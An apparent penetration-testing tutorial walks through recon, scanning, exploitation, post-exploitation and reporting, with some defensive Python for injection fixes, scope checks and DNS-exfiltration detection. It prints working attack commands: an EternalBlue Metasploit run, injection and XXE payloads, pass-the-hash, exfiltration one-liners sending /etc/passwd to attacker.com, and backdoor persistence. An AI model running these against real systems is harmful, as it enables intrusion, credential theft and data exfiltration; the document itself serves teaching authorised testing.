Key Takeaways

  • Penetration testing follows a structured methodology: Recon → Scanning → Exploitation → Post-Exploitation → Reporting.
  • Proper scoping and written authorization are legally essential before any testing.
  • 80% of pentesting is reconnaissance—the more you know, the easier exploitation becomes.
  • Documentation throughout the engagement is crucial for professional reports.
  • Post-exploitation demonstrates real-world impact beyond initial access.
  • The report is what the client pays for—make it actionable and clear.

1. What is Penetration Testing?

Penetration testing, commonly known as "pentesting" or "ethical hacking," is a simulated cyberattack against a computer system, network, or web application to identify security vulnerabilities that an attacker could exploit. Unlike malicious hackers, penetration testers operate with explicit permission and aim to help organizations strengthen their security posture.

The goal of a penetration test is not just to find vulnerabilities, but to demonstrate their real-world impact. Finding a SQL injection is interesting; showing that it leads to complete database access and customer data theft is what drives remediation budgets and executive attention.

Penetration Testing vs. Vulnerability Assessment

Vulnerability Assessment: Identifies and lists vulnerabilities. Automated scanners do most of the work. Results are theoretical—"this could be exploited."

Penetration Testing: Actively exploits vulnerabilities to prove impact. Human expertise is essential. Results are practical—"here's the data I accessed."

Organizations conduct penetration tests for various reasons:

2. Types of Penetration Tests

2.1 By Knowledge Level

Black Box

No prior knowledge. Simulates external attacker. Most realistic but time-consuming.

Gray Box

Partial knowledge (credentials, architecture). Simulates insider or compromised account.

White Box

Full knowledge (source code, network diagrams). Most thorough but less realistic.

2.2 By Target

3. The Penetration Testing Methodology

Professional penetration testing follows established frameworks. The most widely adopted include:

Regardless of framework, penetration testing follows five core phases:

  1. Reconnaissance — Gather information about the target
  2. Scanning & Enumeration — Identify live hosts, open ports, services
  3. Exploitation — Attempt to exploit identified vulnerabilities
  4. Post-Exploitation — Maintain access, pivot, escalate privileges
  5. Reporting — Document findings with actionable recommendations

4. Phase 1: Reconnaissance

Reconnaissance (recon) is the foundation of any successful penetration test. The more information you gather, the more attack vectors you'll identify. Professional pentesters spend significant time on this phase—sometimes 40-60% of the entire engagement.

4.1 Passive Reconnaissance

Passive recon gathers information without directly interacting with the target, avoiding detection:

# WHOIS lookup
whois example.com

# DNS enumeration
dig example.com ANY
dig example.com MX
dig example.com NS
host -t ns example.com

# Subdomain discovery
subfinder -d example.com
amass enum -passive -d example.com
assetfinder --subs-only example.com

# Google dorking
site:example.com filetype:pdf
site:example.com inurl:admin
site:example.com intitle:"index of"
site:example.com ext:sql | ext:db | ext:log

# Shodan
shodan search hostname:example.com
shodan search org:"Target Company"

# Certificate transparency logs
crt.sh/?q=%.example.com

# Wayback Machine (historical data)
waybackurls example.com

# GitHub/GitLab secrets
trufflehog git https://github.com/target/repo
gitleaks detect --source=/path/to/repo

4.2 Active Reconnaissance

Active recon directly interacts with the target and may be detected:

# DNS zone transfer attempt
dig axfr @ns1.example.com example.com

# Active subdomain brute-forcing
gobuster dns -d example.com -w /usr/share/wordlists/subdomains.txt

# Web technology fingerprinting
whatweb https://example.com
wappalyzer https://example.com

# Directory enumeration
gobuster dir -u https://example.com -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u https://example.com -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

# Spider the website
gospider -s https://example.com -d 3

# Collect emails
theHarvester -d example.com -b all

OSINT Resources
  • Shodan: Search engine for internet-connected devices
  • Censys: Internet-wide scanning data
  • SecurityTrails: Historical DNS and WHOIS data
  • Hunter.io: Email address discovery
  • LinkedIn: Employee names and roles (for social engineering)

5. Phase 2: Scanning & Enumeration

5.1 Network Scanning with Nmap

# Host discovery
nmap -sn 192.168.1.0/24

# Full TCP port scan
nmap -sV -sC -p- -T4 target.com -oA full_scan

# Aggressive scan (noisy but comprehensive)
nmap -A -T4 target.com

# UDP scan (slow but important)
nmap -sU --top-ports 100 target.com

# Vulnerability scanning with NSE scripts
nmap --script vuln target.com
nmap --script smb-vuln* target.com

# OS detection
nmap -O target.com

# Fragmented packets (evasion)
nmap -f target.com

# Decoy scan (evasion)
nmap -D RND:10 target.com

5.2 Service Enumeration

# SMB enumeration
smbclient -L //target.com -N
enum4linux -a target.com
crackmapexec smb target.com --shares

# SNMP enumeration
snmpwalk -v2c -c public target.com
onesixtyone -c community.txt target.com

# LDAP enumeration
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com"

# DNS enumeration
dnsrecon -d example.com -t std

# FTP enumeration
nmap --script ftp-anon,ftp-bounce target.com

# SSH enumeration
nmap --script ssh2-enum-algos,ssh-auth-methods target.com

5.3 Web Application Scanning

# Nikto web scanner
nikto -h https://target.com

# Nuclei vulnerability scanner
nuclei -u https://target.com -t nuclei-templates/

# SQLMap for SQL injection
sqlmap -u "https://target.com/page?id=1" --dbs

# WPScan for WordPress
wpscan --url https://target.com --enumerate ap,at,u

# Burp Suite (GUI)
# - Spider the application
# - Active scan for vulnerabilities
# - Manual testing with Repeater/Intruder

6. Phase 3: Exploitation

Exploitation is where theory meets practice. You attempt to leverage discovered vulnerabilities to gain unauthorized access. Always maintain detailed notes—every command, every output.

6.1 Metasploit Framework

# Start Metasploit
msfconsole

# Search for exploits
search type:exploit name:smb
search cve:2017-0144

# Use an exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set LHOST 192.168.1.5
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

# Post-exploitation with Meterpreter
meterpreter> sysinfo
meterpreter> getuid
meterpreter> getsystem
meterpreter> hashdump
meterpreter> download /etc/passwd

6.2 Web Application Exploitation

# SQL Injection
sqlmap -u "https://target.com/page?id=1" --dbs --dump

# Command Injection
; whoami
| id
`id`
$(whoami)

# File Upload Bypass
# Rename shell.php to shell.php.jpg
# Use null byte: shell.php%00.jpg
# Change Content-Type to image/jpeg

# SSRF Exploitation
?url=http://169.254.169.254/latest/meta-data/
?url=file:///etc/passwd

# XXE Exploitation
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
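The command-injection separators listed above (`;`, `|`, backticks, `$( )`) only work because some server-side code concatenates user input into a shell command line. As an added example that is not part of the original article, here is the vulnerable pattern in Python next to two hardened forms: an allowlist plus argument-vector call with no shell, and `shlex.quote` for the rare case where a shell is unavoidable. `echo` stands in for whatever lookup tool the application really calls; the hostname regex and function names are this example's own.

```python
import re
import shlex
import subprocess

# Strict allowlist for a DNS hostname: letters, digits, dots and hyphens only,
# starting and ending with an alphanumeric. Shell metacharacters cannot pass.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")


def lookup_vulnerable(host):
    """The bug: user input is interpolated into a command string that is
    handed to /bin/sh. Any separator from the list above ends the echo and
    starts a second command."""
    cmd = f"echo resolving {host}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def lookup_hardened(host):
    """Fix 1 (preferred): validate against the allowlist, then pass an argument
    vector with shell=False so no shell ever parses the input."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return subprocess.run(["echo", "resolving", host],
                          capture_output=True, text=True).stdout


def lookup_quoted(host):
    """Fix 2 (when a shell string is unavoidable): shlex.quote wraps the value
    in single quotes so ; | ` and $( ) are passed through as literal text."""
    cmd = "echo resolving " + shlex.quote(host)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "example.com; echo INJECTED"
    print("vulnerable:", repr(lookup_vulnerable(payload)))
    print("quoted:    ", repr(lookup_quoted(payload)))
    print("hardened:  ", repr(lookup_hardened("example.com")))
```

When you write this finding up, the evidence is the difference between the first and second outputs: the vulnerable path executes the injected command, the quoted path echoes it back as data, and the allowlisted path refuses it outright, which is the remediation you recommend.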

6.3 Password Attacks

# Hydra brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target.com
hydra -L users.txt -P passwords.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid"

# Hashcat password cracking
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt  # MD5
hashcat -m 1000 hashes.txt rockyou.txt  # NTLM
hashcat -m 3200 hashes.txt rockyou.txt  # bcrypt

# John the Ripper
john --wordlist=rockyou.txt hashes.txt
john --format=NT hashes.txt

Exploitation Ethics

Always stay within scope. Document every action. If you accidentally access out-of-scope systems, stop immediately and report it. Never modify or delete data unless explicitly authorized. Maintain professionalism—you're being trusted with sensitive access.
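"Stay within scope" is easiest to honour when the scope is machine-checked before any tool runs. As an added example (not part of the original article), the following Python encodes a Rules-of-Engagement fragment as data and filters a candidate target list against it, handling the edge cases that cause accidental out-of-scope contact: excluded hosts inside an authorised range, and naive suffix matching that would accept `example.com.evil.net` as a subdomain of `example.com`. The ranges, domain names and exclusions are constructed placeholders; the function names are this example's own.

```python
import ipaddress

# Constructed Rules-of-Engagement fragment. Ranges, names and exclusions are placeholders.
ROE = {
    "networks": ["192.168.1.0/24", "10.10.0.0/16"],
    "domains": ["example.com"],            # the apex and any subdomain of it
    "excluded_hosts": ["192.168.1.1"],     # e.g. the client's production gateway
    "excluded_names": ["payroll.example.com"],
}


def _domain_in(name, allowed):
    """Suffix match on label boundaries only: 'app.example.com' matches
    'example.com', while 'example.com.evil.net' and 'notexample.com' do not."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in allowed)


def in_scope(target, roe=ROE):
    """True only if target lies inside an authorised range or domain and is
    not explicitly excluded. Anything unrecognised is rejected, not allowed."""
    try:
        ip = ipaddress.ip_address(target)
    except ValueError:
        ip = None
    if ip is not None:
        if str(ip) in roe["excluded_hosts"]:
            return False  # exclusion wins even inside an authorised range
        return any(ip in ipaddress.ip_network(n) for n in roe["networks"])
    # Not an IP literal: treat it as a DNS name
    if _domain_in(target, roe["excluded_names"]):
        return False
    return _domain_in(target, roe["domains"])


def filter_targets(targets, roe=ROE):
    """Split a candidate list into (allowed, rejected) before any tool touches it."""
    allowed = [t for t in targets if in_scope(t, roe)]
    rejected = [t for t in targets if not in_scope(t, roe)]
    return allowed, rejected


if __name__ == "__main__":
    ok, bad = filter_targets(["192.168.1.10", "192.168.1.1", "app.example.com",
                              "example.com.evil.net", "payroll.example.com"])
    print("allowed :", ok)
    print("rejected:", bad)
```

Feed the `allowed` list to your scanners and keep the `rejected` list in your notes; if a subdomain-discovery tool returns names that land in `rejected`, that is a question for the client contact, not a target.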

7. Phase 4: Post-Exploitation

Post-exploitation demonstrates the full impact of a breach. It answers: "What can an attacker do after getting initial access?"

7.1 Privilege Escalation

# Linux privilege escalation
sudo -l  # Check sudo permissions
find / -perm -4000 2>/dev/null  # Find SUID binaries
cat /etc/crontab  # Check cron jobs
# Run LinPEAS for comprehensive enumeration
./linpeas.sh

# Windows privilege escalation
whoami /all
systeminfo
# Run WinPEAS
.\winpeas.exe

# Potato attacks (Windows)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t *
PrintSpoofer.exe -i -c cmd

7.2 Lateral Movement

# Pass-the-Hash with Impacket
psexec.py -hashes :NTLM_HASH [email protected]
wmiexec.py -hashes :NTLM_HASH [email protected]

# CrackMapExec for mass exploitation
crackmapexec smb 192.168.1.0/24 -u admin -H NTLM_HASH
crackmapexec smb 192.168.1.0/24 -u admin -H NTLM_HASH --sam

# Evil-WinRM
evil-winrm -i 192.168.1.10 -u admin -H NTLM_HASH

# PsExec with Sysinternals
psexec \\192.168.1.10 -u domain\admin -p password cmd

7.3 Data Exfiltration

# Search for sensitive files
# Windows
dir /s *password* *credential* *.kdbx *.key
findstr /si password *.xml *.ini *.txt *.config

# Linux
find / -name "*.conf" -o -name "*.config" -o -name "*.db" 2>/dev/null
grep -r "password" /var/www/ 2>/dev/null

# Exfiltrate via various channels
# HTTP
curl -X POST -d @sensitive.txt https://attacker.com/upload

# DNS (for when HTTP is blocked)
cat /etc/passwd | base64 | xxd -p | while read line; do dig $line.attacker.com; done

# ICMP
hping3 --icmp attacker.com -d 100 -E /etc/passwd
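The DNS channel above works because most networks let recursive DNS out unfiltered, which is also why it leaves a distinctive trace: a burst of queries from one client whose first label is long, hex-only data to a single base domain. As an added example that is not part of the original article, here is the detection logic a defender (or a tester writing the "how to detect this" remediation note) would run over DNS query logs. The log lines are constructed to match the `base64 | xxd -p` loop shown above; the log format, thresholds and the `attacker.example` domain are this example's own assumptions.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed DNS query log: "time client qname qtype". The first three lines
# mimic the hex labels produced by the base64 | xxd -p loop; the rest are benign.
SAMPLE_DNS_LOG = """\
12:00:01 192.168.1.20 636d6c6a63334d364946643562316b6f4e694d36584e686348526c6367.attacker.example A
12:00:01 192.168.1.20 4c6e5a6a596e5a6a646d4e75596d5a6a6336526a63334d3666446b6f.attacker.example A
12:00:02 192.168.1.20 6247567a6247687a59584e6f5a47467961484e6a62324a36636d4a6a.attacker.example A
12:00:02 192.168.1.20 www.example.com A
12:00:03 192.168.1.21 mail.example.com MX
12:00:03 192.168.1.21 cdn-assets-01.example.com A
"""

HEX_LABEL = re.compile(r"^[0-9a-f]{32,}$", re.IGNORECASE)
LOG_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def shannon_entropy(s):
    """Bits per character; encoded data scores high, real service names low."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def suspicious_label(label):
    """A first label that is long and hex-only, or long with high entropy,
    looks like encoded payload rather than a hostname."""
    if HEX_LABEL.match(label):
        return True
    return len(label) >= 32 and shannon_entropy(label) > 3.5


def parse_log(text):
    """Yield (time, client, qname, qtype) tuples, skipping malformed lines."""
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            yield m.groups()


def flag_exfil(text, min_queries=3):
    """Return {(client, base_domain): count} for every client that sent at
    least min_queries suspicious labels to the same base domain."""
    counts = defaultdict(int)
    for _time, client, qname, _qtype in parse_log(text):
        labels = qname.rstrip(".").split(".")
        if len(labels) < 3:
            continue  # need at least data.base.tld to have a carrier label
        if suspicious_label(labels[0]):
            base = ".".join(labels[-2:])
            counts[(client, base)] += 1
    return {k: v for k, v in counts.items() if v >= min_queries}


if __name__ == "__main__":
    for (client, base), n in flag_exfil(SAMPLE_DNS_LOG).items():
        print(f"{client} -> {base}: {n} suspicious queries")
```

Two signals are combined deliberately: the hex check catches exactly the encoding the page's one-liner uses, and the entropy check catches base32/base64 variants of the same idea without a separate rule for each. The `min_queries` threshold keeps a single odd-looking CDN hostname from paging anyone.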

7.4 Persistence (If Authorized)

# Linux persistence
# Add SSH key
echo "ssh-rsa ATTACKER_KEY" >> ~/.ssh/authorized_keys

# Cron job
echo "* * * * * /tmp/backdoor.sh" >> /var/spool/cron/crontabs/root

# Windows persistence
# Scheduled task
schtasks /create /tn "Backdoor" /tr "C:\backdoor.exe" /sc onlogon

# Registry run key
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\backdoor.exe"

8. Phase 5: Reporting

The report is the deliverable the client pays for. A well-written report drives remediation; a poor report sits unread. Professional reports include:

8.1 Report Structure

  1. Executive Summary — Non-technical overview for leadership (1-2 pages)
    • Overall risk rating
    • Key findings summary
    • Critical recommendations
  2. Scope & Methodology — What was tested and how
    • IP ranges, URLs, applications tested
    • Testing methodology (PTES, OWASP)
    • Tools used
    • Testing dates and timeline
  3. Findings — Detailed vulnerability descriptions
    • Vulnerability title
    • Risk rating (Critical/High/Medium/Low/Info)
    • Description
    • Evidence (screenshots, code snippets)
    • Impact analysis
    • Remediation recommendations
    • References (CVE, CWE, OWASP)
  4. Appendices — Supporting technical data
    • Full tool outputs
    • Exploitation steps
    • Remediation resources

8.2 Risk Rating

Use a consistent risk rating system. CVSS (Common Vulnerability Scoring System) is widely accepted:

Rating     CVSS Score    Remediation Timeline
Critical   9.0 - 10.0    Immediate (24-48 hours)
High       7.0 - 8.9     Urgent (1-2 weeks)
Medium     4.0 - 6.9     Standard (1-3 months)
Low        0.1 - 3.9     Opportunistic (next cycle)
Info       0.0           Consider for improvement

Reporting Best Practices
  • Include screenshots — Visual evidence is compelling
  • Write for your audience — Executive summary for leaders, technical details for developers
  • Provide clear remediation steps — Don't just identify problems, solve them
  • Be accurate — False positives damage credibility
  • Proofread — Professional presentation matters
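The rating bands in 8.2 and the report structure in 8.1 are easy to apply consistently if the findings register is data and the summary numbers are computed from it rather than typed. As an added example (not part of the original article), this Python maps CVSS scores to the table's ratings and timelines, derives the overall risk rating and per-rating counts the executive summary opens with, and renders a severity-sorted findings register. The sample findings, their scores and CWE references are constructed for illustration; the function names are this example's own.

```python
# CVSS bands, ratings and remediation timelines exactly as in the 8.2 table,
# listed most severe first so the first band a score reaches is its rating.
RATING_BANDS = [
    ("Critical", 9.0, "Immediate (24-48 hours)"),
    ("High",     7.0, "Urgent (1-2 weeks)"),
    ("Medium",   4.0, "Standard (1-3 months)"),
    ("Low",      0.1, "Opportunistic (next cycle)"),
    ("Info",     0.0, "Consider for improvement"),
]

# Constructed findings for illustration; titles, scores and CWE ids are placeholders.
SAMPLE_FINDINGS = [
    {"title": "SQL injection in /page?id= parameter", "cvss": 9.8, "cwe": "CWE-89"},
    {"title": "Anonymous SMB share readable",         "cvss": 6.5, "cwe": "CWE-284"},
    {"title": "Verbose server version banner",        "cvss": 0.0, "cwe": "CWE-200"},
    {"title": "Missing HSTS header",                  "cvss": 3.1, "cwe": "CWE-319"},
]


def rate(cvss):
    """Map a CVSS base score (0.0-10.0) to (rating, remediation timeline)."""
    if not 0.0 <= cvss <= 10.0:
        raise ValueError(f"CVSS score out of range: {cvss}")
    for name, low, timeline in RATING_BANDS:
        if cvss >= low:
            return name, timeline
    return RATING_BANDS[-1][0], RATING_BANDS[-1][2]  # unreachable: Info starts at 0.0


def summarize(findings):
    """Per-rating counts plus the overall engagement rating, defined here as
    the rating of the most severe finding (state this definition in the report)."""
    counts = {name: 0 for name, _low, _tl in RATING_BANDS}
    for f in findings:
        counts[rate(f["cvss"])[0]] += 1
    overall = "Info"
    for name, _low, _tl in RATING_BANDS:
        if counts[name]:
            overall = name
            break
    return overall, counts


def findings_table(findings):
    """Plain-text findings register, most severe first, one line per finding."""
    rows = []
    for f in sorted(findings, key=lambda f: -f["cvss"]):
        name, timeline = rate(f["cvss"])
        rows.append(f"{name:<8} {f['cvss']:>4.1f}  {f['title']:<40} {f['cwe']:<8} {timeline}")
    return rows


if __name__ == "__main__":
    overall, counts = summarize(SAMPLE_FINDINGS)
    print(f"Overall risk rating: {overall}")
    print(" ".join(f"{k}={v}" for k, v in counts.items()))
    for row in findings_table(SAMPLE_FINDINGS):
        print(row)
```

Sorting by score rather than by discovery order puts the Critical item at the top of the findings section, and computing the counts from the same list that feeds the appendix removes the classic inconsistency where the executive summary and the findings section disagree on how many High issues there were.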

9. Essential Pentesting Tools

9.1 Operating Systems

  • Kali Linux: Industry standard
  • Parrot OS: Lightweight alternative
  • BlackArch: Arch-based, 2800+ tools
  • Commando VM: Windows-based pentest

9.2 Core Tools by Category

Reconnaissance:

Web Application Testing:

Exploitation:

Password Attacks:

10. Career & Certifications

10.1 Certification Path

Entry Level:

  • CompTIA Security+
  • CEH (Certified Ethical Hacker)
  • eJPT (eLearnSecurity)

Intermediate:

  • OSCP (Offensive Security)
  • PNPT (TCM Security)
  • eCPPT (eLearnSecurity)

Advanced:

  • OSEP
  • OSWE
  • GPEN/GXPN (SANS)
  • CRTO (Red Team Ops)

10.2 Career Paths

Salaries vary significantly by location, company size, and specialization. Bug bounty hunting can supplement income—top hunters earn $200,000+ annually from bounties alone.

10.3 How to Practice

Frequently Asked Questions

Do I need a degree to become a penetration tester?

No. While a CS degree helps, certifications (especially OSCP) and practical skills demonstrated through platforms like HackTheBox matter more. Many successful pentesters are self-taught. Build a portfolio, contribute to open-source security tools, and write about your learning.

Is penetration testing legal?

Only with explicit written authorization! Unauthorized testing is a crime in most jurisdictions. Professional pentesters always work under formal contracts (Rules of Engagement, Statement of Work) that define scope, timing, and emergency contacts. When in doubt, don't test.

Which programming languages should I learn?

Python is essential—most security tools are written in it, and you'll write your own scripts. Bash/PowerShell for system automation. JavaScript for web testing. Go and Rust are increasingly popular for offensive tooling. SQL for database attacks. Understanding C helps with binary exploitation.

What's the difference between pentesting and red teaming?

Penetration testing focuses on finding vulnerabilities within a defined scope, typically in a short timeframe. Red teaming simulates realistic adversaries over extended periods, including physical security, social engineering, and testing detection/response capabilities. Red teams often have broader goals like "access the CEO's email" rather than "test this web app."

Conclusion

Penetration testing is a rewarding but demanding field that combines technical expertise with creative thinking. Following a structured methodology—from thorough reconnaissance through professional reporting—separates amateurs from professionals.

Remember: the goal isn't to break things; it's to help organizations understand and fix their security weaknesses before real attackers exploit them. The best pentesters are problem-solvers who think like attackers but work for defenders.

Start with foundational skills, practice relentlessly on legal platforms, pursue certifications that challenge you (OSCP is the gold standard), and never stop learning. The security landscape evolves constantly, and so must you.
